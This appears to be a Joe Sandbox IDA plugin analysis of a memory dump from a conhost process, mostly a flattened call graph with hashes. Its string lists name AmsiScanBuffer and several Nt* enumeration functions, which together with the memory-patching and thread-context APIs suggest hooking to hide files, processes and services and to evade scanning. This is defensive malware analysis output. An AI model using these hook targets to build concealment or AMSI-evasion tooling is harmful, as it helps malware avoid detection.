1d54783fe6a 9063->9064 9065 1d54783d2a0 __free_lconv_mon 13 API calls 9064->9065 9066 1d54783fe78 9065->9066 9067 1d54783fea2 9066->9067 9069 1d54783d220 __std_exception_copy 13 API calls 9066->9069 9068 1d54783fec1 InitializeCriticalSectionEx 9067->9068 9072 1d54783feab 9067->9072 9068->9067 9070 1d54783fe94 9069->9070 9071 1d54783d2a0 __free_lconv_mon 13 API calls 9070->9071 9071->9067 9073 1d54783f820 9076 1d54783f7d8 9073->9076 9081 1d54783c558 EnterCriticalSection 9076->9081 9333 1d5478333a8 9334 1d5478333cf 9333->9334 9335 1d54783349c 9334->9335 9336 1d5478333ec PdhGetCounterInfoW 9334->9336 9336->9335 9337 1d54783340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 9336->9337 9338 1d547833488 GetProcessHeap HeapFree 9337->9338 9339 1d547833440 StrCmpW 9337->9339 9338->9335 9339->9338 9341 1d547833455 9339->9341 9340 1d547833950 12 API calls 9340->9341 9341->9338 9341->9340 8605 1d54783aaac 8606 1d54783aad9 __except_validate_context_record 8605->8606 8607 1d547839324 _CallSETranslator 9 API calls 8606->8607 8608 1d54783aade 8607->8608 8610 1d54783ab38 8608->8610 8612 1d54783abc6 8608->8612 8619 1d54783ab8c 8608->8619 8609 1d54783ac34 8609->8619 8647 1d54783a22c 8609->8647 8611 1d54783abb3 8610->8611 8610->8619 8620 1d54783ab5a __GetCurrentState 8610->8620 8634 1d5478395d0 8611->8634 8616 1d54783abe5 8612->8616 8641 1d5478399cc 8612->8641 8616->8609 8616->8619 8644 1d5478399e0 8616->8644 8617 1d54783acdd 8620->8617 8622 1d54783afb8 8620->8622 8623 1d5478399cc Is_bad_exception_allowed 9 API calls 8622->8623 8624 1d54783afe7 __GetCurrentState 8623->8624 8625 1d547839324 _CallSETranslator 9 API calls 8624->8625 8632 1d54783b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8625->8632 8626 1d54783b0fb 8627 1d547839324 _CallSETranslator 9 API calls 8626->8627 8628 1d54783b100 8627->8628 8629 1d547839324 _CallSETranslator 9 API calls 8628->8629 8630 1d54783b10b __FrameHandler3::GetHandlerSearchState 8628->8630 8629->8630 8630->8619 8631 1d5478399cc 9 API calls Is_bad_exception_allowed 8631->8632 8632->8626 8632->8630 8632->8631 8633 1d5478399f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8632->8633 8633->8632 8704 1d547839634 8634->8704 8636 1d5478395ef __FrameHandler3::FrameUnwindToEmptyState 8708 1d547839540 8636->8708 8639 1d54783afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8640 1d547839624 8639->8640 8640->8619 8642 1d547839324 _CallSETranslator 9 API calls 8641->8642 8643 1d5478399d5 8642->8643 8643->8616 8645 1d547839324 _CallSETranslator 9 API calls 8644->8645 8646 1d5478399e9 8645->8646 8646->8609 8712 1d54783b144 8647->8712 8649 1d54783a6f4 8650 1d54783a645 8650->8649 8690 1d54783a643 8650->8690 8765 1d54783a6fc 8650->8765 8651 1d54783a373 8651->8650 8662 1d54783a3ab 8651->8662 8653 1d547839324 _CallSETranslator 9 API calls 8657 1d54783a687 8653->8657 8654 1d54783a575 8660 1d54783a592 8654->8660 8661 1d5478399cc Is_bad_exception_allowed 9 API calls 8654->8661 8654->8690 8655 1d547839324 _CallSETranslator 9 API calls 8658 1d54783a2da 8655->8658 8657->8649 8659 1d547838070 _invalid_parameter_noinfo 8 API calls 8657->8659 8658->8657 8663 1d547839324 _CallSETranslator 9 API calls 8658->8663 8664 1d54783a69a 8659->8664 8667 1d54783a5b4 8660->8667 8660->8690 8758 1d5478395a4 8660->8758 8661->8660 8662->8654 8678 1d5478399e0 9 API calls 8662->8678 8737 1d54783a96c 8662->8737 8751 1d54783a158 8662->8751 8666 1d54783a2ea 8663->8666 8664->8619 8668 1d547839324 _CallSETranslator 9 API calls 8666->8668 8669 1d54783a5ca 8667->8669 8667->8690 8701 1d54783a6d7 8667->8701 8670 1d54783a2f3 8668->8670 8671 1d54783a5d5 8669->8671 8674 1d5478399cc Is_bad_exception_allowed 9 API calls 8669->8674 8723 1d547839a0c 8670->8723 8677 1d54783b1dc 9 API calls 8671->8677 8672 1d547839324 _CallSETranslator 9 API calls 8675 1d54783a6dd 8672->8675 8674->8671 8676 1d547839324 _CallSETranslator 9 API calls 8675->8676 8679 1d54783a6e6 8676->8679 8681 1d54783a5eb 8677->8681 8678->8662 8684 1d54783c2f4 14 API calls 8679->8684 8685 1d547839634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8681->8685 8681->8690 8682 1d547839324 _CallSETranslator 9 API calls 8683 1d54783a335 8682->8683 8683->8651 8687 1d547839324 _CallSETranslator 9 API calls 8683->8687 8684->8649 8686 1d54783a605 8685->8686 8762 1d547839838 RtlUnwindEx 8686->8762 8689 1d54783a341 8687->8689 8691 1d547839324 _CallSETranslator 9 API calls 8689->8691 8690->8653 8693 1d54783a34a 8691->8693 8726 1d54783b1dc 8693->8726 8697 1d54783a35e 8733 1d54783b2cc 8697->8733 8699 1d54783a6d1 8700 1d54783c2f4 14 API calls 8699->8700 8700->8701 8701->8672 8702 1d54783a366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8702->8699 8777 1d547839178 8702->8777 8705 1d547839662 __FrameHandler3::FrameUnwindToEmptyState 8704->8705 8706 1d54783968c RtlLookupFunctionEntry 8705->8706 8707 1d5478396d4 8705->8707 8706->8705 8707->8636 8709 1d54783958b 8708->8709 8710 1d547839560 8708->8710 8709->8639 8710->8709 8711 1d547839324 _CallSETranslator 9 API calls 8710->8711 8711->8710 8713 1d54783b169 __FrameHandler3::FrameUnwindToEmptyState 8712->8713 8714 1d547839634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8713->8714 8715 1d54783b17e 8714->8715 8782 1d547839db4 8715->8782 8718 1d54783b190 __FrameHandler3::GetHandlerSearchState 8785 1d547839dec 8718->8785 8719 1d54783b1b3 8720 1d547839db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8719->8720 8721 1d54783a28e 8720->8721 8721->8649 8721->8651 8721->8655 8724 1d547839324 _CallSETranslator 9 API calls 8723->8724 8725 1d547839a1a 8724->8725 8725->8649 8725->8682 8727 1d54783b2c3 8726->8727 8732 1d54783b207 8726->8732 8728 1d54783a35a 8728->8651 8728->8697 8729 1d5478399e0 9 API calls 8729->8732 8730 1d5478399cc Is_bad_exception_allowed 9 API calls 8730->8732 8731 1d54783a96c 9 API calls 8731->8732 8732->8728 8732->8729 8732->8730 8732->8731 8734 1d54783b339 8733->8734 8736 1d54783b2e9 Is_bad_exception_allowed 8733->8736 8734->8702 8735 1d5478399cc 9 API calls Is_bad_exception_allowed 8735->8736 8736->8734 8736->8735 8738 1d54783aa28 8737->8738 8739 1d54783a999 8737->8739 8738->8662 8740 1d5478399cc Is_bad_exception_allowed 9 API calls 8739->8740 8741 1d54783a9a2 8740->8741 8741->8738 8742 1d5478399cc Is_bad_exception_allowed 9 API calls 8741->8742 8743 1d54783a9bb 8741->8743 8742->8743 8743->8738 8744 1d54783a9e7 8743->8744 8745 1d5478399cc Is_bad_exception_allowed 9 API calls 8743->8745 8746 1d5478399e0 9 API calls 8744->8746 8745->8744 8747 1d54783a9fb 8746->8747 8747->8738 8748 1d54783aa14 8747->8748 8749 1d5478399cc Is_bad_exception_allowed 9 API calls 8747->8749 8750 1d5478399e0 9 API calls 8748->8750 8749->8748 8750->8738 8752 1d547839634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8751->8752 8753 1d54783a195 8752->8753 8754 1d5478399cc Is_bad_exception_allowed 9 API calls 8753->8754 8755 1d54783a1cd 8754->8755 8756 1d547839838 9 API calls 8755->8756 8757 1d54783a211 8756->8757 8757->8662 8759 1d5478395b8 __FrameHandler3::FrameUnwindToEmptyState 8758->8759 8760 1d547839540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8759->8760 8761 1d5478395c2 8760->8761 8761->8667 8763 1d547838070 _invalid_parameter_noinfo 8 API calls 8762->8763 8764 1d547839932 8763->8764 8764->8690 8766 1d54783a735 8765->8766 8771 1d54783a948 8765->8771 8767 1d547839324 _CallSETranslator 9 API calls 8766->8767 8768 1d54783a73a 8767->8768 8769 1d54783a759 EncodePointer 8768->8769 8776 1d54783a7ac 8768->8776 8770 1d547839324 _CallSETranslator 9 API calls 8769->8770 8772 1d54783a769 8770->8772 8771->8690 8772->8776 8788 1d5478394ec 8772->8788 8774 1d5478399cc 9 API calls Is_bad_exception_allowed 8774->8776 8775 1d54783a158 19 API calls 8775->8776 8776->8771 8776->8774 8776->8775 8778 1d547839197 8777->8778 8779 1d5478391c0 RtlPcToFileHeader 8778->8779 8780 1d5478391e2 RaiseException 8778->8780 8781 1d5478391d8 8779->8781 8780->8699 8781->8780 8783 1d547839634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8782->8783 8784 1d547839dc7 8783->8784 8784->8718 8784->8719 8786 1d547839634 __FrameHandler3::FrameUnwindToEmptyState RtlLookupFunctionEntry 8785->8786 8787 1d547839e06 8786->8787 8787->8721 8789 1d547839324 _CallSETranslator 9 API calls 8788->8789 8790 1d547839518 8789->8790 8790->8776 9082 1d54783c828 9083 1d54783c82d 9082->9083 9087 1d54783c842 9082->9087 9088 1d54783c848 9083->9088 9089 1d54783c88a 9088->9089 9090 1d54783c892 9088->9090 9091 1d54783d2a0 __free_lconv_mon 13 API calls 9089->9091 9092 1d54783d2a0 __free_lconv_mon 13 API calls 9090->9092 9091->9090 9093 1d54783c89f 9092->9093 9094 1d54783d2a0 __free_lconv_mon 13 API calls 9093->9094 9095 1d54783c8ac 9094->9095 9096 1d54783d2a0 __free_lconv_mon 13 API calls 9095->9096 9097 1d54783c8b9 9096->9097 9098 1d54783d2a0 __free_lconv_mon 13 API calls 9097->9098 9099 1d54783c8c6 9098->9099 9100 1d54783d2a0 __free_lconv_mon 13 API calls 9099->9100 9101 1d54783c8d3 9100->9101 9102 1d54783d2a0 __free_lconv_mon 13 API calls 9101->9102 9103 1d54783c8e0 9102->9103 9104 1d54783d2a0 __free_lconv_mon 13 API calls 9103->9104 9105 1d54783c8ed 9104->9105 9106 1d54783d2a0 __free_lconv_mon 13 API calls 9105->9106 9107 1d54783c8fd 9106->9107 9108 1d54783d2a0 __free_lconv_mon 13 API calls 9107->9108 9109 1d54783c90d 9108->9109 9114 1d54783c6f8 9109->9114 9128 1d54783c558 EnterCriticalSection 9114->9128 9342 1d547840fa8 9343 1d547840fcc 9342->9343 9344 1d547838070 _invalid_parameter_noinfo 8 API calls 9343->9344 9345 1d54784100e 9344->9345 9130 1d547836430 9131 1d54783643d 9130->9131 9132 1d547836449 9131->9132 9138 1d54783655a 9131->9138 9133 1d5478364cd 9132->9133 9134 1d5478364a6 SetThreadContext 9132->9134 9134->9133 9135 1d54783663e 9137 1d54783665e 9135->9137 9140 1d547834b20 VirtualFree 9135->9140 9136 1d547836581 VirtualProtect FlushInstructionCache 9136->9138 9139 1d547835530 3 API calls 9137->9139 9138->9135 9138->9136 9143 1d547836663 9139->9143 9140->9137 9141 1d5478366b7 9144 1d547838070 _invalid_parameter_noinfo 8 API calls 9141->9144 9142 1d547836677 ResumeThread 9142->9143 9143->9141 9143->9142 9145 1d5478366ff 9144->9145 7944 1d54783bd34 7945 1d54783bd49 7944->7945 7946 1d54783bd4d 7944->7946 7959 1d54783e864 7946->7959 7951 1d54783bd6b 7985 1d54783bda8 7951->7985 7952 1d54783bd5f 7953 1d54783d2a0 __free_lconv_mon 13 API calls 7952->7953 7953->7945 7956 1d54783d2a0 __free_lconv_mon 13 API calls 7957 1d54783bd92 7956->7957 7958 1d54783d2a0 __free_lconv_mon 13 API calls 7957->7958 7958->7945 7960 1d54783e871 7959->7960 7964 1d54783bd52 7959->7964 8004 1d54783cacc 7960->8004 7962 1d54783e8a0 8009 1d54783e53c 7962->8009 7965 1d54783edc8 GetEnvironmentStringsW 7964->7965 7966 1d54783bd57 7965->7966 7967 1d54783edf8 7965->7967 7966->7951 7966->7952 7968 1d54783ece8 WideCharToMultiByte 7967->7968 7969 1d54783ee49 7968->7969 7970 1d54783ee53 FreeEnvironmentStringsW 7969->7970 7971 1d54783c5d0 14 API calls 7969->7971 7970->7966 7972 1d54783ee63 7971->7972 7973 1d54783ee6b 7972->7973 7974 1d54783ee74 7972->7974 7976 1d54783d2a0 __free_lconv_mon 13 API calls 7973->7976 7975 1d54783ece8 WideCharToMultiByte 7974->7975 7978 1d54783ee97 7975->7978 7977 1d54783ee72 7976->7977 7977->7970 7979 1d54783ee9b 7978->7979 7980 1d54783eea5 7978->7980 7981 1d54783d2a0 __free_lconv_mon 13 API calls 7979->7981 7982 1d54783d2a0 __free_lconv_mon 13 API calls 7980->7982 7983 1d54783eea3 FreeEnvironmentStringsW 7981->7983 7982->7983 7983->7966 7986 1d54783bdcd 7985->7986 7987 1d54783d220 __std_exception_copy 13 API calls 7986->7987 7999 1d54783be03 7987->7999 7988 1d54783be0b 7989 1d54783d2a0 __free_lconv_mon 13 API calls 7988->7989 7991 1d54783bd73 7989->7991 7990 1d54783be6d 7992 1d54783d2a0 __free_lconv_mon 13 API calls 7990->7992 7991->7956 7992->7991 7993 1d54783d220 __std_exception_copy 13 API calls 7993->7999 7994 1d54783be92 8200 1d54783bebc 7994->8200 7995 1d54783c328 __std_exception_copy 38 API calls 7995->7999 7998 1d54783d2a0 __free_lconv_mon 13 API calls 7998->7988 7999->7988 7999->7990 7999->7993 7999->7994 7999->7995 8000 1d54783bea6 7999->8000 8002 1d54783d2a0 __free_lconv_mon 13 API calls 7999->8002 8001 1d54783d06c _invalid_parameter_noinfo 17 API calls 8000->8001 8003 1d54783beb9 8001->8003 8002->7999 8005 1d54783cae8 FlsGetValue 8004->8005 8007 1d54783cae4 8004->8007 8005->8007 8006 1d54783cafe 8006->7962 8007->8006 8008 1d54783c940 __std_exception_copy 13 API calls 8007->8008 8008->8006 8032 1d54783e7ac 8009->8032 8016 1d54783e5a7 8017 1d54783d2a0 __free_lconv_mon 13 API calls 8016->8017 8031 1d54783e58e 8017->8031 8018 1d54783e5b6 8018->8018 8058 1d54783e8e0 8018->8058 8021 1d54783e6b2 8023 1d54783d1f4 __std_exception_copy 13 API calls 8021->8023 8022 1d54783e6cc 8024 1d54783e70d 8022->8024 8028 1d54783d2a0 __free_lconv_mon 13 API calls 8022->8028 8025 1d54783e6b7 8023->8025 8026 1d54783e774 8024->8026 8069 1d54783e05c 8024->8069 8027 1d54783d2a0 __free_lconv_mon 13 API calls 8025->8027 8030 1d54783d2a0 __free_lconv_mon 13 API calls 8026->8030 8027->8031 8028->8024 8030->8031 8031->7964 8033 1d54783e7cf 8032->8033 8037 1d54783e7d9 8033->8037 8084 1d54783c558 EnterCriticalSection 8033->8084 8039 1d54783e571 8037->8039 8041 1d54783cacc 14 API calls 8037->8041 8044 1d54783e22c 8039->8044 8042 1d54783e8a0 8041->8042 8043 1d54783e53c 56 API calls 8042->8043 8043->8039 8085 1d54783dd78 8044->8085 8047 1d54783e24c GetOEMCP 8049 1d54783e273 8047->8049 8048 1d54783e25e 8048->8049 8050 1d54783e263 GetACP 8048->8050 8049->8031 8051 1d54783c5d0 8049->8051 8050->8049 8052 1d54783c61b 8051->8052 8057 1d54783c5df __std_exception_copy 8051->8057 8054 1d54783d1f4 __std_exception_copy 13 API calls 8052->8054 8053 1d54783c602 HeapAlloc 8055 1d54783c619 8053->8055 8053->8057 8054->8055 8055->8016 8055->8018 8056 1d54783b470 __std_exception_copy 2 API calls 8056->8057 8057->8052 8057->8053 8057->8056 8059 1d54783e22c 16 API calls 8058->8059 8060 1d54783e91b 8059->8060 8061 1d54783ea71 8060->8061 8063 1d54783e958 IsValidCodePage 8060->8063 8068 1d54783e972 8060->8068 8062 1d547838070 _invalid_parameter_noinfo 8 API calls 8061->8062 8064 1d54783e6a9 8062->8064 8063->8061 8065 1d54783e969 8063->8065 8064->8021 8064->8022 8066 1d54783e998 GetCPInfo 8065->8066 8065->8068 8066->8061 8066->8068 8101 1d54783e344 8068->8101 8199 1d54783c558 EnterCriticalSection 8069->8199 8086 1d54783dd9c 8085->8086 8092 1d54783dd97 8085->8092 8087 1d54783cab0 _invalid_parameter_noinfo 14 API calls 8086->8087 8086->8092 8088 1d54783ddb7 8087->8088 8093 1d54783ffb4 8088->8093 8092->8047 8092->8048 8094 1d54783ffc9 8093->8094 8095 1d54783ddda 8093->8095 8094->8095 8096 1d547840a40 _invalid_parameter_noinfo 14 API calls 8094->8096 8097 1d547840020 8095->8097 8096->8095 8098 1d547840048 8097->8098 8099 1d547840035 8097->8099 8098->8092 8099->8098 8100 1d54783e8c4 _invalid_parameter_noinfo 14 API calls 8099->8100 8100->8098 8102 1d54783e38f GetCPInfo 8101->8102 8111 1d54783e485 8101->8111 8107 1d54783e3a2 8102->8107 8102->8111 8103 1d547838070 _invalid_parameter_noinfo 8 API calls 8105 1d54783e524 8103->8105 8105->8061 8112 1d547841474 8107->8112 8111->8103 8113 1d54783dd78 14 API calls 8112->8113 8114 1d5478414b6 8113->8114 8132 1d54783ec58 8114->8132 8133 1d54783ec61 MultiByteToWideChar 8132->8133 8204 1d54783bec1 8200->8204 8205 1d54783be9a 8200->8205 8201 1d54783beea 8203 1d54783d2a0 __free_lconv_mon 13 API calls 8201->8203 8202 1d54783d2a0 __free_lconv_mon 13 API calls 8202->8204 8203->8205 8204->8201 8204->8202 8205->7998 8791 1d547832ab4 TlsGetValue TlsGetValue TlsGetValue 8792 1d547832b0d 8791->8792 8797 1d547832b79 8791->8797 8794 1d547832b15 8792->8794 8792->8797 8793 1d547832b74 8794->8793 8795 1d547832c32 TlsSetValue TlsSetValue TlsSetValue 8794->8795 8796 1d547833f88 StrCmpNIW 8794->8796 8795->8793 8796->8794 8797->8793 8797->8795 8798 1d547833f88 StrCmpNIW 8797->8798 8798->8797 9146 1d54783ec30 GetCommandLineA GetCommandLineW

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 07fcff90c878bb49bb014a0041508c6db0ee3d506095432bb243403372a48738
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 2E519C70A00E4AA5EF90EB68ED547D42323F75076BF805623980902561FFBE86DED3C2

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: acf08177accd688951241f3642a0c2e510dcfd9490e2fd9992d428b8029861c3
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 2CD06734A11E00D6EFA86B15E8543D82263BB64F43FC41517C50A116A0FFAD99DDA3C2

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 000001D547833A35
                                                  • PathFindFileNameW.SHLWAPI ref: 000001D547833A44
                                                    • Part of subcall function 000001D547833F88: StrCmpNIW.SHLWAPI(?,?,?,000001D54783272F), ref: 000001D547833FA0
                                                    • Part of subcall function 000001D547833EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833EDB
                                                    • Part of subcall function 000001D547833EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F0E
                                                    • Part of subcall function 000001D547833EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F2E
                                                    • Part of subcall function 000001D547833EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F47
                                                    • Part of subcall function 000001D547833EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001D547833A5B), ref: 000001D547833F68
                                                  • CreateThread.KERNELBASE ref: 000001D547833A8B
                                                    • Part of subcall function 000001D547831E74: GetCurrentThread.KERNEL32 ref: 000001D547831E7F
                                                    • Part of subcall function 000001D547831E74: CreateThread.KERNELBASE ref: 000001D547832043
                                                    • Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832049
                                                    • Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832055
                                                    • Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832061
                                                    • Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D54783206D
                                                    • Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832079
                                                    • Part of subcall function 000001D547831E74: TlsAlloc.KERNEL32 ref: 000001D547832085
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: e4252b887d8190c8cb5ff571e513bf233a51b16f3e19eec2b73a82e28a3630af
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: 40114C31A10E0192FFE0A72AE5597DD23A3E754797F90421B9416919D0FF7AC4C486C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: a359f520ded64d5a4205867f34b4f0599f6147fac5652aa21422b5a208f6ae5b
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 0F914A727019D087DFA48F15D400BBD7B92F748B9AF56812AAE4907B88EB34D892C751

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000001D547831724: GetProcessHeap.KERNEL32 ref: 000001D54783172F
                                                    • Part of subcall function 000001D547831724: HeapAlloc.KERNEL32 ref: 000001D54783173E
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D5478317AE
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D5478317DB
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D5478317F5
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831815
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D547831830
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831850
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D54783186B
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D54783188B
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D5478318A6
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D5478318C6
                                                  • SleepEx.KERNELBASE ref: 000001D547831BDF
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D5478318E1
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831901
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D54783191C
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D54783193C
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D547831957
                                                    • Part of subcall function 000001D547831724: RegOpenKeyExW.ADVAPI32 ref: 000001D547831977
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D547831992
                                                    • Part of subcall function 000001D547831724: RegCloseKey.ADVAPI32 ref: 000001D54783199C
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: 225da3b0a620ceffb87c908fb02f0386234bc24a81003241eb2dcde69dda7dd6
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: 0F312D75B00E4181FFD09B2ED5503E923A6EB48FE2F0454238E0D87296FF26C8D28296

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
